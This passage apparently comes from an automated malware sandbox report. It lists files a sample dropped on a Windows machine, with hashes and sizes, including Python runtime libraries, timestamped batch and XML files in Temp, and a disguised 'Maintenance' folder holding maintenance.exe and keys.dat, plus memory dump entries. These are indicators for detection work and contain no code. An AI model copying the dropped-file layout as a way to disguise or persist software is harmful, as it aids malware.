8abe0c059ef3403d067a49cf8abcb883c7f113ec

SHA256
ae14e8d2ac9adbbb1c1d2a8001a017ba577663322fe7606c22bc0081d2764bc9

SHA512
6cc4a3ede744f81a8e619ee919dfc25e3d16bdcdcf25ec49699d9c1b5511e29d88c67bb7f6936363960838a73e4417668fe6a18220bf777baf174bb8278b69be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\libeay32.dll

Filesize
1.2MB

MD5
ceef7d25903265391c926978cd340d79

SHA1
96fa3c93219a6c601f1edccba8e8f34f62261a7d

SHA256
c35382b8c55c06660ed6025c732e978edcfc20f08d06f5042c45a55fa88ff6ae

SHA512
52af013717761bc5389042172ab12c63f8539f200aaf52a15360c63896f1f035e403344b8d1bdbabdb0de569a9fbedc50a3a0bf2f6fd0cb0106693d3ba07208b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\msgpack._packer.pyd

Filesize
56KB

MD5
cacae63b9c54ad318f8880c16671fa24

SHA1
42d23169a32f6cf14ab190684c119f0fb23ef211

SHA256
27016f24a0038138b2ada13bbdbfb83dcfb6cd3b9a6cf8001ee7cff5fb55d2b2

SHA512
802f3b1d8f81e3f8fa4cbe0004d93ff83bdffdbfbffc37d3dab92be28333bafce1ff3cca371fabb8bcbc0ec12a6f418d7f7c27dcb09364c21b436820703bf651

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\msgpack._unpacker.pyd

Filesize
70KB

MD5
402bd5cd418eddaac5ebdfe3dfd47e91

SHA1
a7b86d97bd51ecf4b6f3408449ade5684fef8014

SHA256
e7a955f96285f592d1ed74e3ce10706f72bb903322893c08d67b29995baf1e52

SHA512
1c82cba52b1ff686d608067692972d7fc807463f75f1eb01510cd032b68de6b26175d41072a494c83c36c88daf56fc58f8231fe9aed63d13bdaccf4844fcbcc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\msvcr100.dll

Filesize
755KB

MD5
bf38660a9125935658cfa3e53fdc7d65

SHA1
0b51fb415ec89848f339f8989d323bea722bfd70

SHA256
60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa

SHA512
25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\numpy.core.umath.pyd

Filesize
665KB

MD5
bf10ba4d7dd92b74ffa4203206e9f64f

SHA1
aebbba521292379511461fc966d6f0664fad20dd

SHA256
cd6b2a57d2335675dee7bf70fc353e2373a74ec690c181bbbab2597fb797314d

SHA512
dd9d879064ab6cd3a5f343cdf930be64db70e151c85136d0aaf0bbb70ec0cc605af5a3ba4be6a9b749039ee6a484d5dce63bb4cd197b07b60bae06b5e2e22a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\pyexpat.pyd

Filesize
141KB

MD5
6ab0907cb39324f03769092dd45caa80

SHA1
aed7c8aab23ca52c57e6ec3f129665aaaffaf5a5

SHA256
f5bdabbc4b7396d0836b0c7e6908a73a33650d503d7a89f2b8357f9e8f371171

SHA512
70b2ad3c2651c2069511b9839e80fafb304de132bd1cd2dab4cc5cfc6735baf7df43640513e3cb71fb7a9f77008b860fc17647f5a4443ea4f50a578f3e3d4ced

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\python27.dll

Filesize
2.5MB

MD5
fc4fd09975a71eada8f10229237ba2bc

SHA1
d3ffc76d46efd9d96f50c8100e88aeb97ce81691

SHA256
9c6de49f0ba3e97fc1948fa44ca14de6a3919f0b7ee7fc5bf0b728ad5f7e330b

SHA512
1f5cad5329b27156cecba35bd35b6f36584bbbb340017ed6357f80575d3a1bb213dfe0481c62e6e51b28b1bb069be6524528f259c32008029d303e885a8772b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\select.pyd

Filesize
10KB

MD5
bdc7b944b9319f9708af1949b42bae4b

SHA1
e88c7b522f64b01b442ffb23f2c5c8656033b22c

SHA256
83b5c76d938bc50e58c851d56ef8cbc1001d2e81a1e1f8f5dfed2245244c1472

SHA512
df827e76403a1c01e43106e19921c1c958513bc7a3f6d24f74cc790b2575712281261cb7e9c43a86672f2a218c199d5fc05e51f83a58532cbbd10af1b3c5092f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\sip.pyd

Filesize
77KB

MD5
9925ad8d6724c4a8cf32f3c4a125038d

SHA1
25b198d6e7db9a94569113f7d550dcc09c58d11c

SHA256
27cbfb865ff68496d142788bf7f2a39a3a2fba84d595b2dc7d778f32a2f1d5a3

SHA512
fb96f800da067e91d5394d1fac76b782d1a67d9f8ed6e3a10ccec78dd5bc1d3724f4e10d178ab4691e0d481dae53a11c652b03ba3993738c9d21b2c6a3ece21d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\sqlite3.dll

Filesize
538KB

MD5
09c376407c4874290d9a927c111468b0

SHA1
84156f6b2903a2175af321b38867ce04a19b9ff0

SHA256
d3abe5d3d99ec9c9f570a31a0d2d6efaa6ad18b926b80d9126a73b6f2d21a38e

SHA512
3ba137024faf5b83e4353324999b2561b56e0535e9deab9b7e0e76437ba02551f9468b6263ae2e8d29a373e1febb6b4d64c47a512e4d5fe7fe10d6abed13ee0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\PyQt4.QtCore.pyd

Filesize
1.6MB

MD5
b8fcffd511b6f1ad5c1bd56cecedd72b

SHA1
41a75f56566717bebb7fc0857a1ef5f8f3b5846e

SHA256
a62a88f72c302e910b8d29ddb07fa635272dc71cd3ddfaef4d4b5332df87e08f

SHA512
943069b98f8ec8d1835e888c484252ee3b229d9ab30a8a33892f6802164de2feb3827f80bed4e04a37a5251a6ae264fbe7ddcea87a877a6498eb0a42a91d63a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\_hashlib.pyd

Filesize
993KB

MD5
24c2f70ff5c6eaddb995f2cbb4bc4890

SHA1
c6534a6eb3e1e38fe36332d430eb33eeeb8ecc73

SHA256
8dceafaaec28740385b1cb8cf2655db68ecf2e561053bfe494795019542491e4

SHA512
d262c1b9162f7fcd121fc4c46ce5e85b5ad0e88cadc075ae6fe157ab407fc8558f9860b2cfcae9ae6119bb631c8b978652d1a93e4c2d093b6e7385e81719acf3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\_socket.pyd

Filesize
45KB

MD5
a9cc2ff4f9cb6f6f297c598e9f541564

SHA1
e38159f04683f0e1ed22baba0e7dcc5a9bc09172

SHA256
36a7dd2596598916384044b680d62fc7369d246703a57178c27c74214a78585f

SHA512
9d99f546e5fa8c235fef007d8eca990350f35d11cd903c5d91611c133166845834c27b1c6a9132c71776754580d9e62fb5072ce6ada1f48feecbf408ca39026f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\bz2.pyd

Filesize
69KB

MD5
9897fb7cfe7f78b4e4521d8d437bea0e

SHA1
f7cd930bac39701349ef3043986be42a705da3ad

SHA256
d99399bd6ca916c0490af907fb06530839d0797b18a997ed5c091393fc2292f8

SHA512
ad310e30a58fc42ce9d1b5265c4041ce59ee8acebc4ec5e3ce58af8415423a09387f303e5111938f51f0dff7a44714917ca860788136f4962baf1fbe8cac1088

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\libopenblas.UWVN3XTD2LSS7SFIFK6TIQ5GONFDBJKU.gfortran-win32.dll

Filesize
26.0MB

MD5
3948cdf77b74e661091994fed63f4e91

SHA1
f78925d09d93e4a6a3b050647ba67fec139a420a

SHA256
e9c64b69cf132be063b73a3e97c38702c0d57f7dde1369636e44da9ae930093c

SHA512
b6f148faad61fd16a96b4c50e9c176a8143d3ca9d90a028f67d6f2bd862c708462529d6507e238f689747c8fd29cfd31afbab0c7b5021ccde33b4d262d07004c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\numpy.core.multiarray.pyd

Filesize
1.2MB

MD5
f21eb1e04f9983ba64714ee7acceb2cf

SHA1
ea19650e3a5e055f50d2e03f9a8e51a15fb5fdf9

SHA256
f42e10bbd242532d4a1f1dfd4d18ce031bdcdd02381188b9efe0517c6697a90b

SHA512
08798e8663921a942c845774f42a66a41b6d983a05d39d1977f8417879742e81ca2b97dea0e2d84226c1f5f2447375490770700d655317187103e8e661a92c21

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\numpy.linalg.lapack_lite.pyd

Filesize
12KB

MD5
be8f85142d8afa391fdf507e1d73fb52

SHA1
a40c9833b6d1fb33d9ff362c7ed65674dc30ef85

SHA256
4070d968fc8b8b34454c4317c5435b9354c276c767466865b42f5a884727e956

SHA512
9e6d8a5c6b55e509a6c855f8080f67b4866ff1e0f3333511aca538a8ac73ac0a16341d32bc3eccecf14bf19e1f9f1b03eeede5da6a10f49c733005be8bf08cf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\pythoncom27.dll

Filesize
388KB

MD5
f6ecac88981637fed306f2fc240378da

SHA1
6204e90ef3cefc4a721ffc5a4f3dc55c61bade33

SHA256
da73bbd92ebe1ed9c48fb81aac05ea3e14bb602f5b103d539e06cfb052a003a1

SHA512
cc0c0493575f9e997819c7ab7e76df35e9186127bd3b0128d9d0d19352f2276e88496268c96aebc53f36ece2c8e3b0a91d7591a2b9c3d839b9ce46f21776a828

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\pywintypes27.dll

Filesize
108KB

MD5
1a14592ebd1d981b49ecf6f78f970ca1

SHA1
071e141bfc0e1254bf5a8d3815be8d401f67940e

SHA256
78ce56a0f78c983ebff7e52832f0ca46f0bda748b14cebbb5217633de0176912

SHA512
3a98468129d7c5dfa7ceff17f83cdba2b799355b7ab753e067e92153b6db315bbceae73f4a5e6fa75ad380232a6fff518160fc1bc01550c0d50fca7cff10fe6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45~1\win32api.pyd

Filesize
98KB

MD5
5b347e4d8c656d014758abc59cb23f79

SHA1
8776b1bdedfed9037006de315669b85ce01a69ad

SHA256
93316c54c6483a4090a14b648a707b391ef2bcf4a65ca11ddb282078e76d53f5

SHA512
7bb006611dbcb0bf469bcffc33d4d3f048ebb7eb4ad3c33e67e30a07a33431d8e74de7cc15825f509b1658b8fe7bc954e30435a5fdac2570153c3c851f81f942

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjakkuqn.s4e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zb20241119123722538.bat

Filesize
744B

MD5
d8405f0c6f27fa1f5d4751b23bc535fc

SHA1
b32442af05b21db9fb02dc21489ca36fd65b97be

SHA256
88491bec93962215db46bff71b1005cd0ccbd6a196de2e52d4643fa5dd28cb60

SHA512
52c7ef968b9295e3ab410e5a6455cdbb678e530d60c4d30317ef535d852fa552d7180084c37de369427dea52e5e3bf513c512fd48c1ba9421875c1e9d42b6b53

Download Submit
C:\Users\Admin\AppData\Local\Temp\zbe20241119123722538.bat

Filesize
379B

MD5
767e11c2d4f48e65932feecaeb1c789c

SHA1
d3513f44445d8302753cb19fe492e896c3c2f09b

SHA256
868c7cca1f898f49366f435675fce02d317f07d378abf4d32439d2b7421e3f9f

SHA512
240ebbca544d958b10d3c4317a39e596442583fdb470e1691beabb89cdfb022a7864fe98e8c82b32b0cbe4d243c75f16ae6e662bf7a26de69c1268cf5098786f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ze20241119123722538.tmp

Filesize
3.1MB

MD5
eda2b634ec03bb63bcc03039424feefa

SHA1
937a0ec57acbf2a85b402905823432e64ff1e42f

SHA256
e25b98ed0153d8a73b40b0eceb8237fa2399beec4e984b4f806bb80e17b71d7e

SHA512
38ec2b8ce7b2c6ba9b32d66965207e757684f28e1c0f41a525da37e46062ad5723a9a86d49aab5b6243e9855b856c9e207becf4ec8edb95be139e8bd331213a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\zx20241119123722538.xml

Filesize
1KB

MD5
208c7b734e3675d61861857f2b433e89

SHA1
d44b0755dd23f4311f99a77181329d9255f406ca

SHA256
34f27e0440c923adc4de57f4ff1fc8e5b12911df1aeab7a52c0feffdebfcdf80

SHA512
b76fae5d6923ea04fe7d40c642704a1bea4067e3767ca22c5160a8210d42a5bbd468b75902989d68798dc0e0634ee0617bfd4271070445da1ba3d9d79b77e1b5

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

Filesize
2.2MB

MD5
73ad6d009f1c53c23f5d068caa805299

SHA1
f50493f49c3b2b3697b5eb571738dbc70383cac0

SHA256
a77315296dc58edac4959c9ed69ec96e9517883684edaeba3e64c48a44c186ae

SHA512
1f9c739c7b745ba57b3d7e50e00bac9d3019de25aab5bb22c0da810d963dab93d71c56686fccf737cf87a4c95fe53b8e4b3dda09ac1526fb4899aa0e1336e920

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\keys.dat

Filesize
1KB

MD5
9aec15c24588c5f2b11c19ffa4f5ae26

SHA1
1d6f15e4ff42c24eb86ed036f749f0766a451739

SHA256
3bec419b06790054fdd2cf3a7f94be544c5f2af280c8a53328b3dce86f753f09

SHA512
614b37f88e627460d1e7209f906296056b68ba177f862a8de3eff0c0963433b63c32310728f126018b29b46be8a1895dfcec3f78f27e0409172b30fb80dd605f

Download Submit
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc

Filesize
33.8MB

MD5
38b657df43b002bab8fcb08efc0adf49

SHA1
8a4dfbe7ff29921ff9f464ba308e4e1f82698613

SHA256
e714337ac069b06aa5ba66cc37c55ebf6da0546838e96850818474544742fe58

SHA512
79e07ec5c5daff3d6b61024e16423e6225df1f7944296fac0cd3411f2e7f731bbf1461a53602f4472c4880e6ac7837cf295510809441fc3a09625d5094bd9674

Download Submit
memory/736-1241-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/736-1206-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/736-18-0x0000000000CB0000-0x0000000000CC4000-memory.dmp

Filesize
80KB

Download
memory/736-966-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/736-1255-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/736-1253-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/736-1251-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/736-1243-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/736-1249-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/736-42-0x0000000000400000-0x0000000000AA3000-memory.dmp

Filesize
6.6MB

Download
memory/2676-1245-0x0000000008640000-0x0000000008802000-memory.dmp

Filesize
1.8MB

Download
memory/2676-21-0x00000000059F0000-0x0000000006018000-memory.dmp

Filesize
6.2MB

Download
memory/2676-23-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/2676-36-0x00000000066C0000-0x000000000670C000-memory.dmp

Filesize
304KB

Download
memory/2676-24-0x0000000006090000-0x00000000060F6000-memory.dmp

Filesize
408KB

Download
memory/2676-22-0x00000000056F0000-0x0000000005712000-memory.dmp

Filesize
136KB

Download
memory/2676-41-0x0000000008A20000-0x0000000008FC4000-memory.dmp

Filesize
5.6MB

Download
memory/2676-1246-0x0000000009500000-0x0000000009A2C000-memory.dmp

Filesize
5.2MB

Download
memory/2676-20-0x0000000002D50000-0x0000000002D86000-memory.dmp

Filesize
216KB

Download
memory/2676-35-0x0000000006680000-0x000000000669E000-memory.dmp

Filesize
120KB

Download
memory/2676-37-0x0000000007DF0000-0x000000000846A000-memory.dmp

Filesize
6.5MB

Download
memory/2676-39-0x0000000007970000-0x0000000007A06000-memory.dmp

Filesize
600KB

Download
memory/2676-40-0x0000000007680000-0x00000000076A2000-memory.dmp

Filesize
136KB

Download
memory/2676-38-0x0000000006BE0000-0x0000000006BFA000-memory.dmp

Filesize
104KB

Download
memory/2676-34-0x0000000006200000-0x0000000006554000-memory.dmp

Filesize
3.3MB

Download
memory/4740-1197-0x000000000BBE0000-0x000000000BC84000-memory.dmp

Filesize
656KB

Download
memory/4740-1209-0x000000006B000000-0x000000006C64E000-memory.dmp

Filesize
22.3MB

Download
memory/4740-1178-0x0000000002BF0000-0x0000000002C05000-memory.dmp

Filesize
84KB

Download
memory/4740-1195-0x00000000038D0000-0x00000000038EA000-memory.dmp

Filesize
104KB

Download
memory/4740-1196-0x000000000BBC0000-0x000000000BBD3000-memory.dmp

Filesize
76KB

Download
memory/4740-1201-0x000000006E4E0000-0x000000006EA60000-memory.dmp

Filesize
5.5MB

Download
memory/4740-1199-0x000000000BC90000-0x000000000BD5C000-memory.dmp

Filesize
816KB

Download
memory/4740-1193-0x0000000004B10000-0x0000000004BBA000-memory.dmp

Filesize
680KB

Download
memory/4740-1187-0x0000000004350000-0x000000000448C000-memory.dmp

Filesize
1.2MB

Download